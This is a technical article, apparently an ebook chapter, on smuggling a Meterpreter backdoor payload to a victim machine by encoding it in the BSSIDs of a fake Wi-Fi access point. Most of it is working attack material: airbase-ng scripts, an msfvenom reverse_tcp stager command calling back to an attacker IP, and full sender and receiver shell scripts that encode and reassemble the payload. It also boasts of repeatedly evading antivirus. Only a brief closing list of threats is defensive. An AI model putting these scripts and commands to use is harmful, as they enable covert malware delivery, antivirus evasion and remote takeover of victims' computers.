Transferring Backdoor Payloads with BSSID by Wireless Traffic

Damon Mohammadbagher
Aug 18, 2020



Note: this article was originally published on March 5, 2017.

In this article I want to talk about wireless access points and the BSSID (the MAC address of an AP) as a channel for transferring a payload.

In the previous article we used ARP traffic in IPv4 to carry a payload; this technique does the same thing over wireless traffic, so it is close to that ARP technique.

So again we have a backdoor whose payload is never written to the file system, encrypted or not; it exists only in memory. Again this is why the anti-virus products I tested do not detect it (there is no payload on disk for the file scanner to find), and again the Meterpreter payload is transferred without any encryption of the payload in the network traffic, in this case wireless traffic.

The attacker performs the attack by changing the BSSID of a fake AP in a loop: the backdoor payload is injected step by step into the BSSID (the MAC address of the fake AP), and on the client side the infected system (the backdoor system) dumps these payload chunks by scanning for the access point's MAC address (BSSID) on the air, without ever connecting to the fake AP with a username or password. The payload is therefore transferred only through the Wi-Fi devices (the wlan interfaces, i.e. wireless traffic). In my scenario the Meterpreter session itself is then established over the Ethernet network (without the Wi-Fi device) after the payload has been dumped from the scanned BSSIDs.

So you will see that malware, or in this case a simple backdoor, can use your Wi-Fi device (the wlan interface) to transfer and dump payloads silently, and in the end you get a Meterpreter session from simple C# code.

In my scenario the Wi-Fi device is used only for transferring the payload (step 1): the backdoor dumps the payload chunks by scanning for the fake AP's MAC address (BSSID). Then the backdoor establishes the Meterpreter session over eth0, the Ethernet card (step 2), so in that phase we use ordinary network traffic and no Wi-Fi device.

Note: I think it is technically possible to do both steps (step 1 and step 2) with the Wi-Fi device only; I am not sure because I have not tested it, but I think it is possible. I think you need something like an EvilTwin AP for step 2, and you should run the Meterpreter listener on an IP address inside the fake access point's network subnet, and so on.

Note: you can use MANA-Toolkit or something like it for this. Link: https://github.com/sensepost/mana

What are the important points of this method?

The important point is: injecting a malware or backdoor payload into the BSSID of a Wi-Fi device and transferring it over wireless traffic is possible.

Scanning for the payload injected into the BSSIDs of the fake AP, step by step:

For example, we want to transfer this payload (10 bytes, written as hex):

"fec8b00011ddc00945f1"

step 1: the attacker system creates one fake access point with the name "Fake" and the MAC address 00:fe:c8:b0:00:11

  • note: the MAC address 00:fe:c8:b0:00:11 carries our injected payload; the first octet is always 00 and the other five octets are the payload chunk "fec8b00011"
  • this is the first half of the payload "fec8b00011ddc00945f1"

step 2: the backdoor system scans for the ESSID "Fake" and dumps its BSSID

  • note: your backdoor code should take this part of the BSSID (MAC address): fe:c8:b0:00:11 ==> fec8b00011

step 3: the attacker system creates one fake access point with the name "Fake" and the MAC address 00:dd:c0:09:45:f1

  • note: the MAC address 00:dd:c0:09:45:f1 carries our injected payload, the chunk "ddc00945f1"
  • this is the second half of the payload "fec8b00011ddc00945f1"

step 4: the backdoor system scans for the ESSID "Fake" and dumps its BSSID

  • note: your backdoor code should take this part of the BSSID (MAC address): dd:c0:09:45:f1 ==> ddc00945f1

After these two scan steps the infected system (backdoor system) has the whole payload, fec8b00011ddc00945f1.

Now that you understand how the method works, let me show the Linux-side commands for steps 1 and 3 (time to create the fake AP from the command line).

Optional commands: raising the TX power of the Wi-Fi card before creating wlan0mon. These commands can give the fake AP a stronger signal, so you can run them manually if you want (check that the regulatory domain you set and the resulting power are legal where you are):

ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 txpower 30
  • Note: run these commands before creating wlan0mon with airmon-ng; they are optional (not required).

Putting the WLAN card into monitor mode is an important step for creating the fake AP:

with the command "airmon-ng start wlan0" you create "wlan0mon" (monitor mode) from your wlan0.

Note: you can run this command manually once, or put it once as the first line of the script1.sh file as step (cmd 1-1). In this case I ran it manually on the attacker side.

step 1: the attacker system creates one fake access point with the name "Fake" and the MAC address 00:fe:c8:b0:00:11

  • note: the MAC address 00:fe:c8:b0:00:11 carries our injected payload chunk "fec8b00011"

cmd 1-1: airmon-ng start wlan0

  • note: creates wlan0mon (monitor mode)

cmd 1-2: airbase-ng -a 00:fe:c8:b0:00:11 --essid "Fake" -I 10 -0 wlan0mon

  • note: -a sets the BSSID, --essid sets the network name, -I 10 sets the beacon interval to 10 ms (so a scan picks the AP up quickly) and -0 sets all the WPA/WEP/open tags. This fake AP needs to stay up for 15 seconds, so you kill the command from (cmd 1-2) after 15 seconds with killall

cmd 1-3: sleep 15

cmd 1-4: killall airbase-ng

step 3: the attacker system creates one fake access point with the name "Fake" and the MAC address 00:dd:c0:09:45:f1

  • note: the MAC address 00:dd:c0:09:45:f1 carries our injected payload chunk "ddc00945f1"

cmd 3-1: airbase-ng -a 00:dd:c0:09:45:f1 --essid "Fake" -I 10 -0 wlan0mon

  • note: this fake AP also needs to stay up for 15 seconds, so you kill the command from (cmd 3-1) after 15 seconds with killall

cmd 3-2: sleep 15

cmd 3-3: killall airbase-ng

As you can see, these are the commands we need, but there is a big problem with airbase-ng, or maybe I had a big problem with this nice command.

Where is the problem?

The problem starts between step (cmd 1-2) and step (cmd 1-3).

airbase-ng does not return after step (cmd 1-2): it keeps running in the foreground until you stop it with Ctrl+C or kill the process. So a single bash script always stalls at step (cmd 1-2) until I kill that process once.

My solution to this problem is to use two bash script files for these steps:

  • The first bash script, "Script1.sh", holds the airbase-ng steps (cmd 1-2 and cmd 3-1).

note: you can add step (cmd 1-1) once as the first line of this bash script, or run it manually once. In this case I ran (cmd 1-1) manually once.

  • The second bash script, "Script2.sh", holds the sleep and kill steps (cmd 1-3, cmd 1-4, cmd 3-2 and cmd 3-3).

So in this scenario we first run "Script1.sh" and then, immediately or after 2 to 3 seconds, run "Script2.sh" in a second terminal. Each killall in Script2.sh ends the current airbase-ng, so Script1.sh moves on to its next line and the next BSSID.

So we have something like these files:

Script1.sh file:

#!/bin/bash
airbase-ng -a 00:fe:c8:b0:00:11 --essid "Fake" -I 10 -0 wlan0mon ;
airbase-ng -a 00:dd:c0:09:45:f1 --essid "Fake" -I 10 -0 wlan0mon ;

Script2.sh file:

#!/bin/bash
sleep 15 ;
killall airbase-ng ;
sleep 15 ;
killall airbase-ng ;
  • Note: you can use a loop (for example a for loop) in the "Script2.sh" file instead of repeating these two lines.

As you can see in Picture A, we have the script1.sh file that injects the Meterpreter payload into the BSSIDs.

Picture A:

As you can see in Picture A, our Meterpreter payload starts at line 3. In this case my Meterpreter payload was 510 bytes.

With the airbase-ng command you can inject 5 bytes of payload into the BSSID of our fake access point named "Fake".

So we need 102 lines (102 airbase-ng commands) to inject the whole payload into BSSIDs:

102 * 5 = 510 bytes

Note: each BSSID carries 5 bytes of payload; the first octet is always 00.

BSSID  = 00:fc:48:83:e4:f0 {5 bytes} ==> fc-48-83-e4-f0

In this case two more BSSID MAC addresses are added to the script1.sh file as markers:

As you can see in Picture A, line 2 of my script has the MAC address 00:ff:ff:ff:ff:ff. This MAC address (BSSID) is the flag that tells the infected system the attack is starting and the payload transfer begins. As you can see in Picture B, the file must end with the BSSID {00:ff:00:ff:00:ff}, the finish flag.

BSSID Flag for Start  =  00:ff:ff:ff:ff:ff
BSSID Flag for Finish = 00:ff:00:ff:00:ff

BSSID injection loop: the BSSID changes (102 + 2) = 104 times.

Picture B:

You can also see the second script, script2.sh, in Picture C. In this file you can use a loop (for), or write it out line by line as in the picture.

Picture C:

In this file, "script2.sh", airbase-ng has to be killed at least 104 times (once per BSSID).
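The chunking and flag layout described above (the 5-byte chunks of the step-by-step example and the 104-line script1.sh/script2.sh pair), as an added shell example: this is not the author's NativePayload_BSSID tool and not the scripts in Pictures A to C. It builds the BSSID schedule from a hex payload and beacons each BSSID for 15 seconds with timeout(1), which ends airbase-ng on its own and so replaces the separate killall script with a single loop. Assumed: the monitor interface is wlan0mon, airbase-ng and timeout are in PATH, the ESSID is "Fake", and the flag BSSIDs are the two from the article.

```shell
#!/bin/sh
# Added example, not the article's own script1.sh/script2.sh or the
# NativePayload_BSSID tool. Builds the BSSID schedule for a hex payload and
# beacons each BSSID for a fixed time. Assumptions: wlan0mon already exists
# (airmon-ng start wlan0), airbase-ng and timeout are in PATH.

ESSID="Fake"
IFACE="wlan0mon"
HOLD_SECS=15
START_FLAG="00:ff:ff:ff:ff:ff"   # start-of-transfer flag from the article
FINISH_FLAG="00:ff:00:ff:00:ff"  # end-of-transfer flag from the article

# hex_to_bssids HEX: print one BSSID per line carrying 5 payload bytes each.
# The first octet is fixed to 00, as in the article; this also keeps the
# multicast and locally-administered bits clear, so every BSSID is a valid
# unicast address. A short final chunk is right-padded with 00, so the
# receiver must know the real payload length (102 chunks for the 510-byte
# stager in the article).
hex_to_bssids() {
    hex=$(printf '%s' "$1" | tr -d ' \n' | tr 'A-F' 'a-f')
    case "$hex" in
        ''|*[!0-9a-f]*) echo "hex_to_bssids: not a hex string" >&2; return 1 ;;
    esac
    if [ $(( ${#hex} % 2 )) -ne 0 ]; then
        echo "hex_to_bssids: odd number of hex digits" >&2; return 1
    fi
    while [ -n "$hex" ]; do
        chunk=$(printf '%s' "$hex" | cut -c1-10)
        hex=$(printf '%s' "$hex" | cut -c11-)
        while [ ${#chunk} -lt 10 ]; do chunk="${chunk}00"; done
        printf '00:%s:%s:%s:%s:%s\n' \
            "$(printf '%s' "$chunk" | cut -c1-2)" \
            "$(printf '%s' "$chunk" | cut -c3-4)" \
            "$(printf '%s' "$chunk" | cut -c5-6)" \
            "$(printf '%s' "$chunk" | cut -c7-8)" \
            "$(printf '%s' "$chunk" | cut -c9-10)"
    done
}

# bssid_schedule HEX: start flag, payload BSSIDs, finish flag, one per line.
# This is exactly the list of -a values that script1.sh holds.
bssid_schedule() {
    printf '%s\n' "$START_FLAG"
    hex_to_bssids "$1" || return 1
    printf '%s\n' "$FINISH_FLAG"
}

# beacon_bssid BSSID: bring the fake AP up with this BSSID for HOLD_SECS,
# then let timeout(1) kill airbase-ng; this replaces the sleep/killall pairs
# of script2.sh. timeout exits 124 when it had to kill the child, which is
# the expected path here, so that status is not treated as an error.
beacon_bssid() {
    timeout "$HOLD_SECS" airbase-ng -a "$1" --essid "$ESSID" -I 10 -0 "$IFACE" >/dev/null 2>&1
    return 0
}

main() {
    bssid_schedule "$1" >/dev/null || exit 1    # validate before touching the radio
    bssid_schedule "$1" | while read -r bssid; do
        echo "beaconing $ESSID as $bssid for ${HOLD_SECS}s"
        beacon_bssid "$bssid"
    done
}

# Usage: sh bssid_tx.sh fec8b00011ddc00945f1   (nothing runs without an argument)
if [ $# -gt 0 ]; then main "$1"; fi
```

For the article's 510-byte stager, `bssid_schedule` prints the same 104 addresses that script1.sh carries, and the whole transmission takes 104 × 15 s, which is the 26 minutes behind the "after 30 minutes" figure later in the article. Two identical consecutive chunks in a payload are indistinguishable on the receiving side from one chunk seen twice, because the scheme has no sequence number; that limitation belongs to the scheme as described, not to this script.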

Now I want to explain this method step by step with my tool (NativePayload_BSSID.exe):

Step by step:

step 0: create wlan0mon (monitor mode).

syntax: airmon-ng start wlan0

step 1: create the payload for your backdoor with this command:

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > payload.txt

step 2: in this step, convert the payload in payload.txt from the C format "\xfc\x48\x83\xe4" to a plain hex string "fc4883e4" (remove the "\x" separators, the quotes and the line breaks; msfvenom can also emit this form directly with -f hex).

You can use the "help" switch of the tool to show all the syntax, like Picture 1:

Picture 1:

Now copy your payload string and pass it to NativePayload_BSSID with the NULL switch, like Picture 1-1:

syntax: c:\> NativePayload_BSSID.exe null "fc4883e4..."
Picture 1-1:

Now copy all the lines this produces into one bash script, for example the "script1.sh" file.

  • Note: copy and paste only the airbase-ng command lines into the script1.sh file.

In this case there should be 102 lines + 2 (the start and finish flags) = 104 lines.

As in Picture A, you must add "#!/bin/bash" manually as the first line of the script, so the file now has 105 lines.

step 3: in this step run Script1.sh on the Linux side. Don't worry, it is fine that it blocks on the first airbase-ng!

Make it executable with chmod and run the script like Picture 2:

Picture 2:

step 4: in this step create script2.sh and make it executable with chmod, but do not run it yet in this step (step 4), like Picture 3.

Picture 3:
  • Note: you should write this bash script manually, like Picture C.

step 5: in this step run your backdoor, in this case the NativePayload_BSSID.exe tool. As you can see in Picture 4, I started a Meterpreter listener in Kali Linux for the IP address 192.168.1.50 and "script1.sh" is running.

So we have these sub-steps in step 5:

Step AA: Meterpreter listener started (Linux)
Step BB: script1.sh running (Linux)
Step CC: backdoor "NativePayload_BSSID.exe" started (Windows)
Step DD: script2.sh started (Linux)

Step CC: at this point execute the backdoor NativePayload_BSSID with this syntax, like Picture 4:

NativePayload_BSSID.exe "essid"

In this case our ESSID in script1.sh is "Fake", so the correct syntax is:

c:\> NativePayload_BSSID.exe "Fake"

As you can see in Picture 4, these steps were performed (AA, BB and CC).

Picture 4:

As you can see in Picture 4, the backdoor was executed by the user "u1". Then you run "script2.sh" (step DD), like Picture 4.

At this point the backdoor code scans for the ESSID "Fake" on the air and dumps the BSSID of the "Fake" access point. As you can see in Picture 4, my code dumped the BSSID "00:ff:ff:ff:ff:ff" 4 times; this BSSID is the flag for the start of the attack and the payload transfer via BSSID. (Each scan reports whatever BSSID is on the air at that moment, so the same value is dumped repeatedly until the fake AP moves to the next BSSID; the backdoor has to treat a repeated BSSID as the same chunk.)

So on the air we have something like these steps:

Now it is time to run script2.sh (step DD).

After you run Script2.sh, every 15 seconds this script kills one airbase-ng command from your Script1.sh file, so the fake AP's BSSID moves on to the next chunk.

So on the air, after running Script2.sh, we have something like these steps:

As you can see in Picture 5, my backdoor dumps the BSSIDs once "script2.sh" is running.

Picture 5: Transferring Backdoor Payload by BSSID and Wireless Traffic
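The receiving side described in step 5 (scan for the ESSID, dump its BSSID, wait for the start flag, collect the 5-byte chunks, stop at the finish flag) as an added shell example for a Linux client. This is not the NativePayload_BSSID C# code, which does the same job on Windows; it only reconstructs the hex payload and does not execute it. Assumed: the client interface is wlan0 in managed mode, iw(8) is available and the script runs as root, the ESSID is "Fake", and the flag BSSIDs are the two from the article.

```shell
#!/bin/sh
# Added example, not the NativePayload_BSSID C# code: the receiving side of
# the scheme for a Linux client. scan_bssids() uses iw(8) to read the BSSID
# currently beaconed under the target ESSID (assumed interface wlan0, run as
# root); decode_bssids() turns the observed sequence back into the hex payload.

ESSID="Fake"
IFACE="wlan0"
START_FLAG="00:ff:ff:ff:ff:ff"   # start-of-transfer flag from the article
FINISH_FLAG="00:ff:00:ff:00:ff"  # end-of-transfer flag from the article

# scan_bssids: one active scan; print the BSSID of every BSS whose SSID is
# $ESSID. iw prints "BSS <mac>(on <iface>)" followed, a few lines later, by
# an indented "SSID: <name>" line for each network it saw.
scan_bssids() {
    iw dev "$IFACE" scan 2>/dev/null | awk -v want="$ESSID" '
        /^BSS /         { bssid = substr($2, 1, 17) }
        /^[ \t]*SSID: / { sub(/^[ \t]*SSID: /, ""); if ($0 == want) print bssid }'
}

# decode_bssids: read BSSIDs on stdin in the order they were observed.
# A scan loop sees the same fake AP many times during its 15 s on the air,
# so consecutive repeats are collapsed; everything before the start flag is
# ignored; the finish flag ends the transfer. Each payload BSSID contributes
# its last five octets (the first octet is always 00 and carries no data).
decode_bssids() {
    state=idle
    prev=""
    out=""
    while read -r bssid; do
        bssid=$(printf '%s' "$bssid" | tr 'A-F' 'a-f')
        if [ "$bssid" = "$prev" ]; then continue; fi
        prev=$bssid
        case "$state:$bssid" in
            idle:"$START_FLAG") state=rx ;;
            rx:"$FINISH_FLAG")  printf '%s\n' "$out"; return 0 ;;
            rx:*)               out="$out$(printf '%s' "$bssid" | cut -c4- | tr -d ':')" ;;
        esac
    done
    echo "decode_bssids: finish flag not seen" >&2
    return 1
}

# receive_payload: poll the air until the finish flag arrives, then print the
# hex payload (the bytes the backdoor would load into memory). The 2 s poll
# interval is well under the 15 s each BSSID stays on the air.
receive_payload() {
    while :; do
        scan_bssids
        sleep 2
    done | decode_bssids
}

# Usage: sh bssid_rx.sh --live   (nothing runs without --live)
if [ "${1:-}" = "--live" ]; then receive_payload; fi
```

Feeding `decode_bssids` the schedule that script1.sh beacons (start flag, the 102 payload BSSIDs, finish flag) returns the original 510-byte stager as a hex string. Because only consecutive repeats are collapsed, two identical chunks beaconed back to back would be merged into one; the scheme as described carries no sequence number, so a sender that needs to rule this out has to avoid such payloads or change the encoding.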

As you can see in Picture 6, you get the Meterpreter session after about 30 minutes (104 BSSIDs × 15 seconds is 26 minutes, plus the delay described below).

Picture 6:

As you can see, we have an established Meterpreter session from my C# code, and my Kaspersky 2017 anti-virus was bypassed by this method again and again, and finally the Meterpreter session was established.

Note: in Picture 7 you can see that my code establishes the Meterpreter session after a 15-second delay. This delay is built into my code, so if you test this method with my code, after all the payload chunks are dumped you must wait 15 seconds and then you will have the Meterpreter session, I hope ;)

Picture 7:

At a glance: your wireless devices are always exposed, so you should think about these threats:

1. Injecting a malware or backdoor payload into the BSSID of a Wi-Fi device and transferring it over wireless traffic is possible.

2. If you use Wi-Fi devices for your clients and your network infrastructure, you should think about these threats.

3. With this method the infected system stays reachable as long as its Wi-Fi card is on, and one day your clients may be attacked through their Wi-Fi cards by an attacker's cell phone acting as a fake AP.

4. In this case my backdoor scans for an ESSID, for example "Fake", to dump its BSSID, so this transfer is very slow and also very quiet.

5. The anti-virus did not detect this, and your LAN/WAN firewall is bypassed for the payload transfer because none of it crosses that infrastructure: the traffic goes directly over the air between the infected system's Wi-Fi card and the attacker's Wi-Fi card. After the payload has been dumped by the backdoor, we have the reverse_tcp Meterpreter session traffic from the infected system to the attacker system over LAN/WAN, without the Wi-Fi card, and outgoing traffic from the backdoor system to the attacker system on the Internet or LAN is most of the time not blocked by the Windows firewall or similar. That second phase is the part a network defender can still see: it is an ordinary outbound TCP connection, so egress filtering and network monitoring apply to it.

Note: this article was "Chapter 9" of the eBook "Bypassing Anti-Viruses by C# Programming".

GitHub download of the PDF and code for "Chapter 9":

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH9

C# source code : https://github.com/DamonMohammadbagher/NativePayload_BSSID

Video : https://youtu.be/W0dJGln3tls
